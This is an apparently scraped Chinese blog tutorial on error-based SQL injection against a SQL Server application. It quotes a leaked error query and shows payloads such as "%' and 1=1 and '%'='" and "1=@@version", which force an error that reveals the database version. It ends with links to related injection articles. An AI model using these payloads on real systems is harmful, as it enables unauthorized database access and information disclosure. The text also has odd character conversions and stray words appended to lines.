利用永真條件來實現sql注入方法
Q:遇到報錯的sql注入,怎麼辦?sql
一、首先,先把部分語句給copy下來:數據庫
SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at 。。。。。。(後面頗有很長的sql語句)async
二、面對複雜的語句,如何下手? 能夠把上面的語句簡化,容易分析orm
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%') 。。。。。。(後面還有不少就無論了)blog
好了,下面開始研究如何注入。get
利用永真條件來實現sql注入方法:
(若是不使用永真條件進行判斷的話,使用 ' and 1=@@version+-- 那麼很複雜的語句的話,會破壞掉整個sql語句的邏輯,致使執行sql查詢失敗,最終也沒法獲得版本)cmd
一、若是遇到很複雜的語句怎麼辦? 那麼咱們就把複雜的語句簡化爲下面這條語句,以避免亂軍心:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')it
二、插入語句: %' and 1=1 and '%'=' 能夠讓語句拼接正常,而不會報錯
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')io
三、開始搞事情:把 1=1 改成 1=@@version 就會把「真」變成「假」,那麼數據庫將會報錯,就會爆出數據庫版本
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')ast
- 1. SQL注入盲注利用方法
- 2. 利用SQL注入漏洞登陸後臺的實現方法
- 3. 【CTF】利用 Burpsuite Fuzz 實現 SQL 注入
- 4. SQL注入之爆庫利用方法
- 5. SQL注入漏洞利用
- 6. sql注入拿shell條件與方法(統計)
- 7. Android 中利用註解來實現findViewById
- 8. 注入全方位利用-SQL注入的原理分析
- 9. 利用攔截器實現sql防止注入
- 10. 利用SQL注入植入 webshell
- 更多相關文章...
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • SQLite 注入 - SQLite教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
- • SpringBoot中properties文件不能自動提示解決方法
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. CVPR 2020 論文大盤點-光流篇
- 2. Photoshop教程_ps中怎麼載入圖案?PS圖案如何導入?
- 3. org.pentaho.di.core.exception.KettleDatabaseException:Error occurred while trying to connect to the
- 4. SonarQube Scanner execution execution Error --- Failed to upload report - 500: An error has occurred
- 5. idea 導入源碼包
- 6. python學習 day2——基礎學習
- 7. 3D將是頁遊市場新賽道?
- 8. osg--交互
- 9. OSG-交互
- 10. Idea、spring boot 圖片(pgn顯示、jpg不顯示)解決方案